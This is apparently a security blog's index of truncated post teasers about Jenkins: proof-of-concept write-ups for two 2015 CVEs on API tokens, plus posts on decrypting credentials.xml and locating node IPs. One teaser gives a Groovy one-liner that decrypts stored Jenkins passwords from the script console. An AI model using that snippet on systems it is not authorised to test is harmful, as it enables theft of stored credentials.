February 27, 2019

Jenkins – SECURITY-200 / CVE-2015-5323 PoC

API tokens of other users available to admins SECURITY-200 / CVE-2015-5323 API tokens of other users were exposed to admins by default. On instances that don’t […]
February 27, 2019

Jenkins – SECURITY-180/CVE-2015-1814 PoC

Forced API token changeSECURITY-180/CVE-2015-1814 https://jenkins.io/security/advisory/2015-03-23/#security-180cve-2015-1814-forced-api-token-change Affected Versions All Jenkins releases <= 1.605 All LTS releases <= 1.596.1 PoCTested against Jenkins 1.605 Burp output Validate new token […]
February 28, 2019

Jenkins – decrypting credentials.xml

If you find yourself on a Jenkins box with script console access you can decrypt the saved passwords in credentials.xml in the following way:hashed_pw=’$PASSWORDHASH’passwd = hudson.util.Secret.decrypt(hashed_pw)println(passwd)You […]
March 5, 2019

Jenkins – Identify IP Addresses of nodes

While doing some research I found several posts on stackoverflow asking how to identify the IP address of nodes.  You might want to know this if […]